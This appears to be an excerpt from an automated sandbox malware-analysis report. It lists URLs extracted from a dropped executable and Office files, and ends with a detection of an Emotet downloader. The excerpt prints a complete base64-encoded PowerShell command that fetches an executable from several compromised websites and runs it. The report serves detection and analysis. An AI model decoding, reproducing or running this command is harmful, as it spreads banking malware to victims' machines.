    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/10/LOGO-MASTER.jpg?w=600&amp;ssl=1
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/fb10.jpg?fit=1656%2C1104&#038;ssl
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/fb10.jpg?fit=1656%2C1104&amp;ssl=
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/10632.jpg?fit=300%2C300&amp;ssl=1
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/10632.jpg?fit=480%2C480&amp;ssl=1
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/10632.jpg?resize=150%2C150&amp;ss
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/10632.jpg?resize=300%2C300&amp;ss
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/10632.jpg?resize=567%2C567&#038;s
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/10632.jpg?resize=567%2C567&amp;is
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/10632.jpg?resize=75%2C75&amp;ssl=
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/10632.jpg?w=480&amp;ssl=1
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/11.jpg?fit=300%2C200&amp;ssl=1
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/11.jpg?fit=771%2C514&amp;ssl=1
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/11.jpg?resize=300%2C200&amp;ssl=1
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/11.jpg?resize=768%2C512&amp;ssl=1
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/11.jpg?w=771&amp;ssl=1
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/11.jpg?w=800&#038;ssl=1
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/11.jpg?w=800&amp;is-pending-load=
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/9.jpg?fit=300%2C200&amp;ssl=1
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/9.jpg?fit=759%2C506&amp;ssl=1
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/9.jpg?resize=300%2C200&amp;ssl=1
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/9.jpg?w=759&amp;ssl=1
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/9.jpg?w=800&#038;ssl=1
    Source: 744.exe.2.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/9.jpg?w=800&amp;is-pending-load=1
    Source: 744.exe.2.drString found in binary or memory: https://i2.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/10/65623583_1777682085698087_5437773
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://login.microsoftonline.com/common
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://login.windows.local
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://management.azure.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://management.azure.com/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://messaging.office.com/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://ncus-000.contentsync.
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://officeapps.live.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://onedrive.live.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://retailer.osi.office.net/appstate/query
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 744.exe.2.drString found in binary or memory: https://schema.org
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://settings.outlook.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 744.exe.2.drString found in binary or memory: https://stats.wp.com/e-202031.js
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://tasks.office.com
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 744.exe.2.drString found in binary or memory: https://themegrill.com/themes/colormag
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 744.exe.2.drString found in binary or memory: https://wordpress.org
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://wus2-000.contentsync.
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 744.exe.2.drString found in binary or memory: https://www.exactmetrics.com/
    Source: 744.exe.2.drString found in binary or memory: https://www.google-analytics.com/analytics.js
    Source: 744.exe.2.drString found in binary or memory: https://www.google.com/recaptcha/api.js?onload=cf7srLoadCallback&render=explicit
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/#organization
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/1-medium-mobile/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/65623583_1777682085698087_543777356850921472_n/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/?page_id=2266
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/booking/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/comments/feed/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/faqs-2/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/feed/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/logo-master/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/my-booking/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/photo-booth-hire/11-2/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/photo-booth-hire/9-2/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/photo-booth-hire/attachment/10632/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/photo-booth-hire/awards/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/photo-booth-hire/fun/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/photo-booth-hire/glitter/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/pricing/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/privacy-policy/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/reviews/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/t-cs/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/the-booth/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-admin/admin-ajax.php
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/contact-form-7-skins/css/framework/cf7s-default.css
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/contact-form-7-skins/css/framework/cf7s-normalize.c
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/contact-form-7-skins/skins/styles/vanilla/vanilla.c
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/contact-form-7/includes/css/styles.css
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/contact-form-7/includes/js/scripts.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/cookie-notice/css/front.min.css
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/cookie-notice/js/front.min.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/css/rating-display.css
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/css/rating-form.css
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/css/slider-controls-simp
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/js/controller.min.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/js/lib/actual/jquery-act
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/js/lib/form-validation/f
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/js/lib/strongslider/jque
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/js/lib/validate/jquery-v
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/js/lib/verge/verge.min.j
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/templates/default-form/form.css
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/templates/default/content.css
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/ultimate-faqs/css/ewd-ufaq-styles.css
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/ultimate-faqs/css/rrssb-min.css
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/youtube-embed/css/main.min.css
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/fontawesome/css/font-awesome.css
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/colormag-custom.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/fitvids/jquery.fitvids.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/html5shiv.min.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/jquery.bxslider.min.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/magnific-popup/jquery.magnific-popup.min
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/magnific-popup/magnific-popup.css
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/navigation.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/skip-link-focus-fix.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/sticky/jquery.sticky.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/style.css
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/uploads/2019/10/cropped-BAN333333.jpg
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/js/dist/vendor/wp-polyfill-url.min.js
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/wlwmanifest.xml
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-json/
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.groovyboove.co.uk%2F
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.groovyboove.co.uk%2F&#0
    Source: 744.exe.2.drString found in binary or memory: https://www.groovyboove.co.uk/xmlrpc.php?rsd
    Source: 850F2BB5-624C-490D-9F35-352D9323E526.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: 744.exe.2.drString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443

    E-Banking Fraud:

    barindex
    Malicious encrypted Powershell command line foundShow sources
    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e JABVAE0AQwBOAEwAbQBmAGUAPQAnAFIAVABFAE8ATQBjAGYAYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAFIASQBUAGAAeQBgAHAAcgBPAGAAVABvAEMATwBsACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQARQBEAE8AQQBXAGwAcQB2ACAAPQAgACcANwA0ADQAJwA7ACQASwBCAEEATgBIAGsAbQBvAD0AJwBaAEEARgBFAEIAdABxAHAAJwA7ACQAQwBRAEMAQwBXAHoAdwBuAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABFAEQATwBBAFcAbABxAHYAKwAnAC4AZQB4AGUAJwA7ACQAUABGAFAAVwBTAG0AZgB0AD0AJwBRAFEATQBVAFQAcwBiAGwAJwA7ACQATwBDAEQAWABEAHcAZQBrAD0ALgAoACcAbgBlAHcAJwArACcALQAnACsAJwBvAGIAagBlAGMAJwArACcAdAAnACkAIABOAEUAVAAuAFcARQBiAGMAbABJAGUATgBUADsAJABNAFgAWgBLAFUAYQBxAHIAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBoAGEAdABjAGgAZABvAGcAcwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBYAEkAdwAvACoAaAB0AHQAcABzADoALwAvAGcAcgBvAG8AdgB5AGIAbwBvAHYAZQAuAGMAbwAuAHUAawAvAGIAbABvAGcAcwAvADgAVAA5ADQAbQBtAGQAawBhADEAMwAvACoAaAB0AHQAcABzADoALwAvAGcAcgBlAGcAZQBtAGUAcgBzAG8AbgAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AaAB1AGQAeQAxADcAMgA0ADAALwAqAGgAdAB0AHAAOgAvAC8AZwB1AGEAcgBpAHoALgBjAG8AbQAuAGIAcgAvAFcAdQB1AHQAagBsAE8ALwAqAGgAdAB0AHAAOgAvAC8AaABhAGYAZABlAHIALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8AZgBoAHEANwBoADcAYgBhAGIAZABiAGUANQBxADUAMAA1ADIALwAnAC4AIgBTAHAATABgAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFUAWQBVAEMAWgB5AHMAZQA9ACcATABPAEQAVQBWAG0AcgBuACcAOwBmAG8AcgBlAGEAYwBoACgAJABaAFgAUgBWAFgAcABsAGIAIABpAG4AIAAkAE0AWABaAEsAVQBhAHEAcgApAHsAdAByAHkAewAkAE8AQwBEAFgARAB3AGUAawAuACIAZABPAGAAVwBuAGAAbABgAE8AYQBEAEYAaQBMAEUAIgAoACQAWgBYAFIAVgBYAHAAbABiACwAIAAkAEMAUQBDAEMAVwB6AHcAbgApADsAJABaAE4ASQBOAEkAbgB6AHcAPQAnAEEARQBHAE4ARABwAHkAdwAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAEMAUQBDAEMAVwB6AHcAbgApAC4AIgBsAGUAYABOAGcAdABoACIAIAAtAGcAZQAgADMAMwAyADkANQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwByAEUAYABBAHQAZQAiACgAJABDAFEAQwBDAFcAegB3AG4AKQA7ACQATQBGAFIARQBOAGIAdABlAD0AJwBWAFYAWgBDAEcAZABiAHkAJwA7AGIAcgBlAGEAawA7ACQARwBQAEcARABDAGEAcgB6AD0AJwBYAEwATwBWAFkAdgB4AGIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASQBKAFUATQBQAGkAcgBhAD0AJwBCAEMAQQBKAEIAcQBtAHAAJwA=
    Yara detected Emotet DownloaderShow sources
    Source: Yara matchFile source: C:\Users\user\Documents\20200802\PowerShell_transcript.688098.pRHuXFX